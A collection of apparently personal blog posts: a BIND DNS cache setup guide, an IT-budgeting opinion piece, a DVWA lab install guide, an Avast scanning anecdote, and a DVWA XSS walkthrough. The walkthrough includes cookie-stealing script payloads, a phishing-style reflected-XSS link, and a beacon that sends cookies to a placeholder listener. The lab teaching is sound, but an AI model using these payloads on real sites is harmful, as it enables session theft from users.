
Reduce Web Page Load Times and Improve Privacy Control

You can use a cache server for a small to medium-sized business, no matter the industry, or for whatever else you’d like. A DNS cache doesn’t have to be high maintenance or a menace to other people and organizations as long as you take certain precautions in the configuration.

My reasons for creating a DNS cache are:
1. I don’t trust any free public DNS.
2. My organization isn’t going to pay for DNS.
3. A DNS cache is a lot faster than Quad9, OpenDNS, Cloudflare, and all local ISP DNS servers.

I used GRC’s DNS Benchmark program to test how long it takes for a query to be answered through our domain DNS setup, which is client -> Active Directory DNS -> Sophos UTM -> DNS server. I tested the new DNS cache server, Cloudflare, Quad9, OpenDNS, and Google, and took the average of our two internal DNS servers. The results of the test are below (times in seconds), and although the differences are a couple of hundredths of a second (except for Quad9), that makes a substantial difference when you have ~1,000,000 DNS queries a day. There’s also the added bonus of increased privacy, because the DNS cache server recurses to the root DNS servers.

New DNS cache server
cached - 0.000
uncached - 0.057
Dotcom - 0.021

Cloudflare
cached - 0.000
uncached - 0.077
Dotcom - 0.039

Quad9
cached - 0.000
uncached - 0.128
Dotcom - 0.091

OpenDNS
cached - 0.000
uncached - 0.061
Dotcom - 0.039

Google
cached - 0.000
uncached - 0.069
Dotcom - 0.045
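If you want to sanity-check numbers like these yourself, dig reports a per-query time that is easy to pull out with awk. This is just a sketch, not part of the original benchmark: the stats block below is canned sample output standing in for a real `dig @<your server> example.com +noall +stats` run, so the parsing is reproducible.

```shell
# Extract the "Query time" value (in msec) from dig's stats output.
# The heredoc is canned sample output; pipe real dig output in its place.
awk -F'[: ]+' '/Query time/ {print $4}' <<'EOF'
;; Query time: 57 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Mon Jan 01 00:00:00 UTC 2024
EOF
```

Averaging that figure over a handful of domains you haven’t queried before approximates the uncached column above.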

For testing, I’ve provided a VM in VMDK format consisting of CentOS 7 (no GUI) with BIND that weighs in at ~777 MB zipped. Unzipped, the file is 10GB (the total partition size). I have not changed any of the configuration settings for SSH or BIND, so they have default settings. The non-administrative account used to log in is user, and it doesn’t have a password. The superuser password is rootroot. As far as warnings go, change the superuser password and create a password for the user account as soon as possible. Another good idea is to create a new account and add it to the wheel group to avoid using the superuser account when editing the BIND configuration file, updating the operating system, and restarting services.

Requirements
1. Two static IP addresses or a single static IP address – some ISPs allow you to use the dynamic IP that came with your account in addition to the static IP, and if you want to use two static IP addresses, you will have to purchase a block of five.
2. A spare PC or type 1/type 2 virtualization – using a spare PC will be the focus of this article because of the low hardware specifications needed and low complexity.
3. CentOS 7, which you can download from the CentOS website, then make a bootable thumb drive using Rufus or Etcher.

The minimum hardware specification for the server is a dual-core processor (AMD or Intel) and 2GB of memory. I tested the minimum hardware specification up to 600k queries in 24 hours, and the maximum CPU load that I observed via atop was 0.63. If you’re doing over 1 million queries every 24 hours, it won’t hurt to go with a quad-core processor and 4GB memory, but that isn’t necessary until 1.5 million to 2 million queries every 24 hours.
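To put those volumes in perspective, the average query rate is tiny even at the high end, which is part of why such modest hardware holds up. A quick awk conversion of the figures from this article illustrates:

```shell
# Convert queries per day to average queries per second (86,400 s/day).
awk '{printf "%s/day = %.1f qps\n", $1, $1/86400}' <<'EOF'
600000
1000000
2000000
EOF
```

Even 2 million queries a day averages only about 23 queries per second, though bursts will run well above the average.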

If you’re having qualms about using consumer hardware you shouldn’t worry. Sticking with name brands such as EVGA and Rosewill for a power supply and a small solid state drive from Western Digital or Samsung will suffice. I’ve seen consumer hardware run 24/7 for five or six years with few failures, and the failures are typically CPU heat sink fans and case fans.

Performing the following commands through the terminal is recommended, and should be done while connected to your LAN.

Change to the superuser account (enter the password you created during the operating system installation):

$ su

Add the user account that needs sudo privileges to the wheel group:

$ usermod -aG wheel <username>

Switch to the user that you added to the wheel group:

$ su - <username>

Test for user account sudo privileges:

$ sudo <command>

Starts the firewalld service and enables firewalld at boot:

$ sudo systemctl start firewalld
$ sudo systemctl enable firewalld

Check that the firewalld service is running, then reload the firewall rules:

$ sudo firewall-cmd --state
$ sudo firewall-cmd --reload

Changes the default zone to DMZ because only SSH is allowed inbound:

$ sudo firewall-cmd --set-default-zone=dmz

Reload the firewall so the new default zone takes effect:

$ sudo firewall-cmd --reload

Displays the active zone and bound interface:

$ sudo firewall-cmd --get-active-zones

Adds inbound port 53 to the DMZ firewall zone as a permanent rule:

$ sudo firewall-cmd --zone=dmz --add-service=dns --permanent

Reload the firewall rules and display the allowed inbound services (SSH and DNS):

$ sudo firewall-cmd --reload
$ sudo firewall-cmd --zone=dmz --list-all

The BIND configuration file in CentOS7 is located in /etc/ and is called named.conf. The options portion of the configuration file is where we will be making most of the changes. The path to the BIND configuration sample is /usr/share/doc/bind*/sample/etc/named.conf.

There are five important points to remember when editing the configuration file.
1. You must add a space between the curly brackets and the characters that go between them or the named service (BIND) will not restart.
2. Each line must end with a semicolon.
3. A semicolon and a space must separate values inside the curly brackets: { value; value; };
4. Commenting is accomplished with /* at the beginning and */ at the end of each comment.
5. With no forwarders configured, BIND recurses from the root servers, and I don’t see a reason to change that, so the forwarders parameter has been omitted.

options {
    /* This should include the private static IP address that will be accepting queries */
    listen-on port 53 { 127.0.0.1; <private IP>; };

    /* Leave commented out unless you're using IPv6 */
    # listen-on-v6 port 53 { ::1; };

    directory "/var/named";
    dump-file "/var/named/data/cache_dump.db";
    statistics-file "/var/named/data/named_stats.txt";
    memstatistics-file "/var/named/data/named_mem_stats.txt";
    recursing-file "/var/named/data/named.recursing";
    secroots-file "/var/named/data/named.secroots";

    /* The public IP must be the one you will be sending queries from. Misconfiguration here can lead to you and others being attacked */
    allow-query-cache { localhost; <public IP>; };
    allow-query { localhost; <public IP>; };

    /* Recursion is for cache servers only and should be turned off for an authoritative server */
    recursion yes;

    /* Turn on if you are going to use DNSSEC-aware forwarders (the root servers are DNSSEC aware) */
    dnssec-enable no;
    dnssec-validation no;

    bindkeys-file "/etc/named.iscdlv.key";
    managed-keys-directory "/var/named/dynamic";
    pid-file "/run/named/named.pid";
    session-keyfile "/run/named/session.key";
};

To check the configuration file for errors run:

$ sudo named-checkconf /etc/named.conf

Enable named.service (BIND) to start at boot:

$ sudo systemctl enable named.service

Start named.service:

$ sudo systemctl start named.service

Check if named.service is running:

$ sudo systemctl status named.service

Edit the resolv.conf file so the server uses itself for name resolution:

$ sudo <text editor> /etc/resolv.conf

The file should contain:

# Generated by NetworkManager
nameserver <private IP address of the DNS cache server>

Update the operating system and installed packages:

$ sudo yum update

If you receive a “Cannot find a valid baseurl for repo: <repo name>” error when you run the update command, proceed to the troubleshooting notes at the end of this article.

It’s best practice to whitelist who can connect via SSH. The SSH whitelisting will be accomplished through firewalld.

Add a source IP to the DMZ firewall zone (repeat this command for each IP address that you will be connecting from):

$ sudo firewall-cmd --zone=dmz --add-source=<Public IP used to connect to the server/32> --permanent

Reload the firewall so the changes can take effect:

$ sudo firewall-cmd --reload

Check that all sources have been added to the DMZ firewall zone:

$ sudo firewall-cmd --zone=dmz --list-all

We must tell the firewall to drop all packets that do not come from our defined source IP addresses (a rich rule; note the --permanent flag, without which the rule is discarded on reload):

$ sudo firewall-cmd --zone=dmz --add-rich-rule='rule family="ipv4" source address="<source IP>/32" invert="True" drop' --permanent

Reload the firewall so that the rich-rules can take effect:

$ sudo firewall-cmd --reload
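The quoting in that rich rule is easy to get wrong, so it can help to build the rule up in a variable and echo it before handing it to firewall-cmd. A small sketch (198.51.100.7 is an example address, not from my setup):

```shell
# Build the inverted drop rule for one whitelisted source IP.
SRC="198.51.100.7"
RULE="rule family=\"ipv4\" source address=\"${SRC}/32\" invert=\"True\" drop"

# Inspect the rule before applying it.
echo "$RULE"

# Then apply it permanently and reload (requires firewalld):
# sudo firewall-cmd --zone=dmz --add-rich-rule="$RULE" --permanent
# sudo firewall-cmd --reload
```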

The topology diagram and configuration steps are based on Sophos UTM 9.6, since that is what I have at my disposal. I created a DMZ using a whitelist firewall with ports 53, 80, and 443 to Internet IPv4 and IPv6 only (prohibiting DMZ-to-LAN routing and vice versa) to allow for updating the operating system. I also created a destination network address translation (DNAT, a.k.a. port forwarding) rule from Internet IPv4 and IPv6 to the private IP of the server for incoming DNS queries.

1. Configure the internal interface that the DNS server is going to be physically connected to. I chose eth3 and a /30 private class C address space because I need only two addresses: the gateway and the server IP. Eth2 is labeled DMZ on the rear and front of the firewall, but I wanted to leave a space between my LAN ethernet cable and the DMZ ethernet cable.

2. Create an additional address with a public IP address that isn’t in use.

3. Create a new DHCP server that allows a single client IP address to be assigned. I’m going to create a DHCP reservation for the IP address that is assigned to the server (192.168.40.2). I removed the “DNS server 1” entry that was the gateway IP address because the server resolves names for itself (per the resolv.conf file) and recurses to the root DNS servers.

4. Before we can create a DNAT rule, we must make the DHCP reservation by going to the IPv4 Lease Table (Image 1). The server hostname is DNSCACHE. After clicking “Make Static,” a new window will appear that allows you to make a new host (Image 2).

Image 1
Image 2

5. Configure the layer 3 firewall rules that create traffic flow with the allowed services. Web Surfing is ports 80 and 443. Do not put “Any” in the destination box, because traffic would then be allowed between your LAN and DMZ.

6. Create a masquerading rule to allow for address translation, making connectivity over outbound ports 53, 80, and 443 possible. This is where the private address space is mapped to the public IP by selecting the address labeled DMZ that was created in the second step.

7. It’s time to create the DNAT rule that we did the preparation work for in step four by creating a new host definition. Since we have access control configured in the BIND configuration file (the public IP we will be sending queries from), and our LAN and DMZ are allowed to communicate with internet IPv4 and IPv6 addresses only, we can leave the “Any” address object in the “traffic from” box (Image 1). Make sure to select “Automatic firewall rule.” A DNAT rule for SSH must also be created so we can administer the server.

Image 1
Image 2

8. Last, but certainly not least, enable the IPS for the DNS cache network (Image 1), and make sure DNS under “Misc servers” and 12 months and newer rule age is selected (Image 2).

Image 1
Image 2

Connect the DNS server to the firewall. Change the DNS server used by the firewall for forwarding to your new DNS server by creating a new network definition using the green plus symbol.

Next, create a name for the definition such as DNS Cache Server and enter the public IP address in the IPv4 address box. “Type” will remain as host, click “Save,” then click “Apply” and you are now using your private DNS cache server.

Test the rich-rule that was created for SSH whitelisting by trying to connect to the server via SSH from an IP address that was not defined as a source IP. I used an SSH client on my phone.

Troubleshooting notes:
1. CentOS 7 wasn’t scaling the processor frequency above 1.4GHz (FX-8320E at 3.2GHz). I went into the BIOS and disabled the C6 State and Cool ‘N Quiet then used “$ lscpu” to confirm that the CPU was running ~3.2GHz.


The Cost Center Illogic of IT and Infosec

For decades IT and InfoSec have been looked upon as money suckers as a result of the poor understanding of their value and the true role they play in creating revenue.

The idea of removing IT and InfoSec from a cost center view has stirred up strong emotion on Twitter. I posited that, since IT and InfoSec have become the core of business operations, should they still be considered a cost center? People replied in agreement that it’s time to move at least IT from the cost center classification to some other term that isn’t in the lexicon of accountants, because the definition of cost center doesn’t reflect reality.

Other people responded with accusations that I have an IT/InfoSec world-centric view, which is patently false. I never made my view about IT or InfoSec being greater than another department, such as sales, where you get into the “chicken or the egg” logical circle. You can’t deny that technology and the information systems that support technology are intrinsic in everyday life.

According to the Accounting Coach, the definition of a profit center “is a subunit of a company that is responsible for revenues and costs,” and the definition of a cost center “is a subunit of a company that is responsible only for its costs.” My view is that IT drives sales beyond what would be possible without it. InfoSec isn’t as cut and dried as IT because of the different purpose it serves.

Cost recovery for InfoSec (some say there is no cost recovery) becomes obvious when your company is experiencing downtime due to virus infections, ransomware, or the nightmare of information disclosure (accidental or purposeful), because it’s money walking out of the front door.

The cost center mentality has harmed IT since its inception, but more so InfoSec over the last eight or nine years as evidenced by the size and volume of breaches and information disclosures. I have seen legitimate projects rejected or shelved that would have benefitted the company had it not been for the “no cost recovery” context that comes with being classified as a cost center.

There are a myriad of studies showing that IT has propelled developing nations’ GDP.

Here’s a handy list.

https://www.tandfonline.com/doi/abs/10.1080/10438590600661889

https://apcss.org/Publications/Edited%20Volumes/BytesAndBullets/CH3.pdf

https://royalsociety.org/~/media/about-us/international/g-science-statements/2017-may-3-new-economic-growth.pdf?la=en-GB

https://journals.plos.org/plosone/article?id=10.1371/journal.pone.0048903

Microsoft has an IT Business Value Blog, and in an article from 2009, they explain that “There seems to be a steady stream of books published on the role of Information Technology within the business it supports. The role of IT is constantly evolving and has changed significantly from the days when the IT organization was often referred to as “data processing.” Today, in many industries, IT enables some businesses to differentiate themselves from their competitors. Those companies that leverage IT for competitive advantage often differ from their competitors in two ways with respect to their IT organizations: they view IT as a strategic business enabler instead of as a cost center, and they work to maximize the efficiency of their IT operations so that they can focus their resources on providing value to the business and respond to today’s environment of rapidly changing business conditions.”

There is a mountain of evidence showing that how I and others view IT and InfoSec should be treated not as opinion but as fact. Unfortunately, many are still beholden to the archaic cost center mentality because they can’t see past what they’ve been taught.

DVWA Part 2: Exploiting Cross-Site Scripting (XSS) Vulnerabilities

For the second installment of our DVWA series, we are going to look at cross-site scripting (XSS) vulnerabilities and how to exploit them in our Damn Vulnerable Web Application. If you missed part one of this series that shows you how to set up DVWA, you can check it out here.

What is XSS?

Cross-site scripting (from here on out, referred to as XSS) is an injection attack in which malicious scripts are injected into a web application. XSS allows an attacker to send a malicious script to a different user of the web application without their browser being able to acknowledge that this script should not be trusted. The user’s browser sees the script as code that originated from the web application, not from the attacker, and can allow the attacker access to information such as session IDs, cookies, and any other information stored by the browser to use for that site. Typically, web applications are vulnerable to this sort of attack in areas where user input is accepted, and the application does not validate it.

The Difference Between Stored and Reflected XSS

The two most common forms of XSS attacks are stored and reflected attacks. Stored XSS attacks, as the name states, store the script in the website itself. For example, this can occur in a message forum: the XSS script is injected into a field submitted to the forum, and targets run the script when they visit the forum and the page is retrieved by their browser. Reflected XSS attacks occur where the injected script is not stored but instead delivered through other means, such as an email or a search result.

Checking for XSS Vulnerabilities

To check for a possible XSS vulnerability, you need to test every point of user input to see if you can inject HTML and JavaScript code and whether it gets delivered to the output of the page.

We are going to test for this using the XSS (Stored) page on low security in DVWA.

First, let’s check that our XAMPP server is up and running. Open up a terminal and check the status with the command /opt/lampp/lampp status. If the output shows that the services are running, then you are good to go. If the output shows that the services are not running, start them up with the command /opt/lampp/lampp start.

Let’s now navigate to our DVWA application at 127.0.0.1/DVWA (refer to the link at the top of the page for part one of the series on how to set up DVWA).

Once logged in (username: admin; password: password), we want to navigate to the DVWA Security tab, select “Low” in the drop-down box, and hit Submit.

Now we need to navigate to the XSS (Stored) tab. Here we see a guestbook where users can enter their name and a message to submit to the page. We are going to test both of these for HTML and JavaScript injection.

First, we will enter a normal name and a message to see what the typical output is.

We can see that our responses are output to the page in a pretty standard text.

Now let’s see if the forms will allow us to use HTML tags to change the fonts of our responses.

As we can see by the output of our second post, the web app allowed us to change the HTML composition of the output by using bold and italic HTML tags for our input. This means that we may be able to inject other sorts of tags such as JavaScript tags.

The Name field only allows a certain number of characters, so we will attempt to add a JavaScript alert to the Message field using <script>alert("JavaScript!")</script>.

When we submit this entry to the page, look what pops up! An alert stating “JavaScript!”.

We now know that we can inject JavaScript into this form. In the next section, we will take a look at how we can exploit this to get a valid user cookie and session ID.

Stored XSS Exploit

Now that we know the page is vulnerable to XSS while on low security, let’s see how we can get our cookie and session ID to display.

To do this, we are going to use a similar JavaScript alert, but this time use document.cookie as the alert parameter.

Note: Hit the “Clear Guestbook” button so that you do not get the previous “JavaScript!” alert.

We now have our session ID displayed to the screen. Because this is a stored XSS attack, it will persist until we clear the Guestbook. We can click out of the alert, change tabs, and then come back to this tab, and the alert will pop up again, which means that every time a user visits this tab, their session ID will be displayed in an alert.

Reflected XSS Exploit

Now let’s head on over to the XSS (Reflected) tab and check out how we can do a reflected XSS exploitation.

Our goal for this section is to create a URL that when clicked, displays our cookie and session ID in an alert.

Let’s get started by entering a simple response to the form to see what the standard output is and checking out the URL displayed.

As we can see, our input is taken and then displayed to the screen in the string “Hello [our input]” as well as in the URL where it is added as the value of the name variable.

Let’s now try and input the script that we used in the last section to display the cookie and session ID: <script>alert(document.cookie)</script>.

It works! Our session ID is posted to the screen in an alert, and when we take a look at the URL, it shows the script assigned as the value for the name variable.

Let’s take note of the URL that we want to have submitted to that page for the exploit to work: http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name=<script>alert(document.cookie)<%2Fscript>#.
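The %2F in that URL is just the percent-encoded slash in the closing </script> tag. If you want to percent-encode the entire payload (which survives copy-pasting better), here is a quick sketch using python3’s urllib with the same payload as above:

```shell
# Percent-encode the reflected XSS payload and append it to the DVWA URL.
python3 - <<'EOF'
from urllib.parse import quote
payload = '<script>alert(document.cookie)</script>'
# safe='' encodes the slash as %2F as well
print('http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name=' + quote(payload, safe=''))
EOF
```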

In this case, the user’s cookies will not be displayed when they navigate to XSS (Reflected) tab on their own like in the previous section because the input we give the form is not stored in the application. Instead, we need to send the above link to a user in a social engineering attempt (such as a phishing email) to get them to send the reflected XSS attack themselves. Let’s try this out and open up a new tab and navigate to this link in the new tab (while keeping the previous tab open).

Success! When we navigate to the link, it again displays our cookie and session ID.

So there you have it. In this tutorial, we were able to exploit DVWA with both stored and reflected XSS to display the cookie and session ID in an alert. If we wanted to take this a step further for more practical use, instead of having the alert pop up for a user that visits the website, it could instead be sent to a remote server that we are running. This way, we receive the session ID and can authenticate as that user.
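As a sketch of that last idea, the alert can be swapped for an image beacon that ships document.cookie to a host you control. The listener address 192.0.2.10:8000 is a placeholder, not part of the tutorial; something as simple as `nc -l -p 8000` (flags vary by netcat flavor) will show the incoming request:

```shell
# Print the exfiltration variant of the payload used in this tutorial.
# 192.0.2.10:8000 is a hypothetical attacker-controlled listener.
cat <<'EOF'
<script>new Image().src="http://192.0.2.10:8000/?c="+document.cookie;</script>
EOF
```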

Installing Damn Vulnerable Web Application (DVWA) Using XAMPP in Kali Linux

In order to learn web app exploitation safely (and legally), it is useful to have practice applications to run on your local environment. Damn Vulnerable Web Application (DVWA) was created for just this purpose. DVWA contains many common web vulnerabilities such as SQL injection, XSS, and more that allow you to hone your web hacking skills.

In this article, we will go over how to install DVWA using XAMPP web server in Kali Linux.

Downloading XAMPP

To start, we need to download XAMPP to our Kali Linux machine at https://www.apachefriends.org/download.html. We will download the latest version listed for Linux (currently 7.2.7 at the writing of this article) and save the file.

Next we will open our terminal and navigate to our Downloads directory using: cd Downloads

Once in the Downloads directory, we use the command ls -l to get a list of the files and their permissions.

As seen in the screenshot above, we do not currently have execute permissions on the XAMPP installer. To add execute permissions, we perform the following command: chmod +x xampp-linux-x64-7.2.7-0-installer.run (note: make sure to replace the file name with the one that you currently have in your directory).

When we check the file permissions again, we have the execute permission on the file as shown by the “x” and the green color of the file name.

The next step is to run the installer using the command: ./xampp-linux-x64-7.2.7-0-installer.run.

A setup wizard will pop up to go through the steps of installing. While installing ensure the following:

  • Both “XAMPP Core Files” and “XAMPP Developer Files” are checked
  • Take note of the path that is being used for installation (/opt/lampp)
  • Ignore the Internet pop-up and continue with the installation
  • You do not need to launch XAMPP upon finishing the installation

Once XAMPP is installed, we will go to the XAMPP control panel and make sure the MySQL database server and the Apache web server are running by doing the following:

  • Navigate to /opt/lampp either in your terminal or in the files finder (from Places > Computer).
  • Locate the manager-linux-x64.run and open it
    • From terminal: ./manager-linux-x64.run
    • From files finder: double-click
  • Click “Manage Servers” tab at the top
  • Make sure both servers show as “Running”
    • If the status of either does not show “Running” then select it and then click “Start” on the right

Downloading DVWA

To download DVWA we go to http://www.dvwa.co.uk/ and hit the big download button at the bottom of the page and save the file.

Again, we will open up our terminal and navigate to the Downloads directory and use ls -l to show the files.

The file is zipped, so we will need to unzip it using the command: unzip DVWA-master.zip.

Now that it is unzipped, we are going to rename the directory from DVWA-master to dvwa for ease of use, utilizing the command: mv DVWA-master dvwa.

To use DVWA in XAMPP, we will move the dvwa directory to the public HTML folder within the installation path that we noted earlier (/opt/lampp). To do this we use the command: mv dvwa /opt/lampp/htdocs.

Next, we need to remove the database password from the DVWA configuration file, located in /opt/lampp/htdocs/dvwa/config. Once in that directory, we will open the file using the Nano text editor (note: you can use whatever text editor you like): nano config.inc.php.dist.

Using our arrow keys, we navigate down to the db_password line and delete the password so that it just shows two quotation marks as seen below.

Next, we will hit control+o on our keyboard to write out the changes to the file then hit enter to confirm. Then we will hit control+x to exit Nano.

Once that is completed, we need to copy config/config.inc.php.dist to config/config.inc.php. While still in the config directory, use the command: cp config.inc.php.dist config.inc.php.
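The Nano edit above can also be done non-interactively with sed. This is a sketch shown against a sample line rather than the real file so that it is reproducible; the real file lives in /opt/lampp/htdocs/dvwa/config:

```shell
# Blank the db_password value in a DVWA-style config line.
# sample.php stands in for the real config.inc.php.dist here.
cat > sample.php <<'EOF'
$_DVWA[ 'db_password' ] = 'p@ssw0rd';
EOF
sed -i "s/\('db_password' ] = \)'[^']*'/\1''/" sample.php
cat sample.php
```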

Using DVWA with XAMPP

Now that all of the installations are done, we will open up Firefox and navigate to the web address http://127.0.0.1/dvwa.

Now we need to create the database. Navigate to the bottom of the page and click the “Create / Reset Database” button.

Once the database is created, it should take you to the login page after a few seconds; if it doesn’t, navigate to the login page manually.

To log in use the below credentials:

  • Username: admin
  • Password: password

That’s it. You are logged into DVWA and you can do all of your evil deeds in a safe and legal environment. Please note that you may need to go to the “DVWA Security” tab and change the Security Level to adjust the difficulty of compromise.

 

A story about “free” antivirus

A colleague of mine was working on a coworker’s personal computer. The job was a fresh Windows 10 installation, and my colleague decided to install Avast Antivirus Free. Shortly after installing Avast, Security Onion lit up like a Christmas tree. I didn’t recognize the IP address that the alerts were originating from, so I went into our equipment room, where I found the PC plugged in. When I unplugged the ethernet cable, the alerts stopped, so I knew I had found the culprit.

Upon initial investigation, I saw that Malwarebytes and Avast were installed. I’ve worked with Malwarebytes in the past and knew that the activity I saw in Security Onion wasn’t typical of it, but I didn’t rule out an altered installer that was retrieved from an untrusted source. I uninstalled Malwarebytes as my first step then I went home because it was the end of the workday. When I came in the next day (Thursday) I saw that there were a few of the same alerts from the previous day, overnight. I chalked the overnight alerts up to Avast then uninstalled it and installed Sophos Home, a far superior product in my opinion.

Just so we’re on the same page, I haven’t used Avast in over a decade because of their bloatware and the tactics used to get you to upgrade to the paid version. Avast has a good signature repository, but with 300,000 new pieces of malware produced daily, they’ve become a one trick pony security solution.

The next day (Friday) I spun up a Windows 10 1803 VM and installed Avast only, then I was quite busy the rest of the day. It wasn’t until Monday that I was able to get back to the VM, where I ran a scan manually. The alerts that pop up during a scan without the advanced features enabled are below.

The alerts are a result of a “Network Threat Scan” that is actually an unauthenticated vulnerability scan. The first two times I ran the scan (physical then VM) the same hosts were chosen for testing, but a third scan (second from the VM) chose different hosts except for the network firewall. The method used to decide which host is tested is unknown.

I asked my colleague where he downloaded the Avast installer from and he said that it was an old version from CNET that he had downloaded that day. The thing is, CNET doesn’t carry an old version of Avast. I downloaded the Avast installer from CNET and directly from Avast then hashed them using SHA1. The hashes were different, the installer downloaded from CNET was signed one day and one hour later than the installer downloaded from Avast, and they are the same size, 175KB. Both installers are downloaded and updated from Avast servers.
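Comparing installers by hash is simple to script. This sketch generates two tiny stand-in files so it runs anywhere; in practice you would point sha1sum at the two downloaded installers (the file names here are examples):

```shell
# Compare two files by SHA1 and report whether they match.
printf 'installer from vendor' > vendor.bin
printf 'installer from mirror' > mirror.bin

if [ "$(sha1sum < vendor.bin)" = "$(sha1sum < mirror.bin)" ]; then
  echo "identical"
else
  echo "different"
fi
```

SHA-1 is fine for spotting that two files differ, as here, though sha256sum is the better choice when you are verifying integrity against a published digest.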

The left window is the installer downloaded from Avast. The right window is the installer downloaded from CNET.

 

The left window is the SHA1 hash of the installer downloaded from Avast. The right window is the SHA1 hash of the installer downloaded from CNET.

The idea is that any information you put into a free product will be used to track you and serve advertisements, or will be sold, to compensate for your use of the product.

Surely, a security company wouldn’t do that, right?

Maybe.

I went to the Avast End User License Agreement (EULA) from the Settings -> About Avast menu in the antivirus application, where roughly halfway down the page was a link to the privacy policy. Privacy policies are purposely vague to give the company as much legal leeway as possible when it comes to using your data. Avast is no different.

 

After clicking on the Privacy Policy link, you’re taken here.

The Privacy Policy begins by describing its purpose, its goal, and its limits (vaguely), and none of that language sets off any alarms. Things get interesting in section five, paragraph three, where it’s stated that third-party ads are delivered to users of their mobile product. Mobile devices are one of the most popular attack vectors; combine that with ad networks being purposely insecure (for the sake of speed and profit) and you have a dangerous combination. Their “most trusted” claim in the opening paragraph is starting to look shaky.

So far Avast has said that they collect your personal data to conduct business, deliver services, improve products, etc. all while being GDPR compliant, then they deliver code that immediately executes to your mobile device that contains highly valued and sought after data that ultimately has little protection even when using antivirus.

In the Service Data section, Avast describes what they collect and states that they anonymize the data they collect about your product usage, without any details. I can’t find any reason why Avast would need vulnerability scan data from your network except to bait you into buying more licenses. Based on the typical person that uses Avast Antivirus Free, they would have no idea how to remediate what the vulnerability scan found other than to spend more money.

I haven’t been able to find where research is defined which is what I believe they use to collect more data than they need.

Here’s more research usage without specifics for Device and Network Information, and at the end of the section, they state “serve our legitimate interests” without describing what that is.

I conducted an unscientific poll on Twitter, and 91% of respondents said that they wouldn’t be comfortable with Avast having the results of a vulnerability scan.

https://twitter.com/Milwizzle/status/1018905788147032064